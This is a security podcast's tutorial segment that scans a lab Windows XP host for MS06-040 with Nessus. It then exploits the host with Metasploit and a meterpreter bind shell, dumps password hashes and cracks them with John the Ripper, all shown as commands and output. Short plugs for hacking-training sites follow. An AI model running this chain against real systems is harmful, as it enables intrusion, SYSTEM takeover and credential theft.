Episode106 – PaulDotCom Security Weekly
Tech Segment: Probe, Exploit, and Crack for Free
On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show 🙂 I run the nessuscmd, tell it to OS fingerprint with -O, Print out a full report with -V, use plugin-id 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and to test host 192.168.10.139.
root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139
It reports:
Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
|
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| ‘server’ service.
|
| Description :
|
|
| The remote host is vulnerable to a buffer overrun in the ‘Server’
| service
| which may allow an attacker to execute arbitrary code on the remote
| host
| with the ‘System’ privileges.
|
| Solution :
|
|
| Microsoft has released a set of patches for Windows 2000, XP and
| 2003 :
|
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
|
|
| Risk factor :
|
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409Sweet, I love vulnerabilities! They are sexy and exciting, especially MS006_040, because its just so delicious and begging to be devoured my metasploit. I have metasploit 3.1 installed in OS X:
/framework-3.1/trunk gordon$ ./msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::=[ msf v3.2-release
+ — –=[ 286 exploits – 124 payloads
+ — –=[ 17 encoders – 6 nops
=[ 62 auxI want to tell metasploit to use the following module:
msf > use windows/smb/ms06_040_netapi
I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcpI then tell metasploit what to target:
msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139
Here are what my options look like:
msf exploit(ms06_040_netapi) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.10.139 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options:
Name Current Setting Required Description
—- ————— ——– ———–
DLL /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local portExploit target:
Id Name
— —-
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)Now I tell metasploit to execute my exploit with the above options:
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)To access session 1 I use the following command:
msf exploit(ms06_040_netapi) > sessions -i 1
I then tell meterpreter to load the Sam Juicer module:
meterpreter > use -m Sam
Then I issue the “hashdump” command:
meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::So then I copy and paste those results into my other directory with John The Ripper Installed:
paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::Then I crack the passwords using the stock dictionary that comes with John:
paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session abortedW00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!
Security and Hacking Documentation
[ad name=”front”]
If you are interested to learn something about IT Security, Hacking or Vulnerability Exploitation this is the right place where to start. In this page i put more than 200 papers and the links of more than 100 books on this topic.
Hack this site!
[ad name=”front”]
This site is brill if you want to get your hacking skills up and kinda find out how things are done.
Hack This Site is a free, safe and legal training ground for hackers to test and expand their hacking skills. More than just another hacker wargames site, we are a living, breathing community with many active projects in development, with a vast selection of hacking articles and a huge forum where users can discuss hacking, network security, and just about everything. Tune in to the hacker underground and get involved with the project.
I came across this site a while back now and have completed all the basic hacks and the first three realistic scenarios
Have fun guys and gals and let us know how you get on and what you think.
[ad]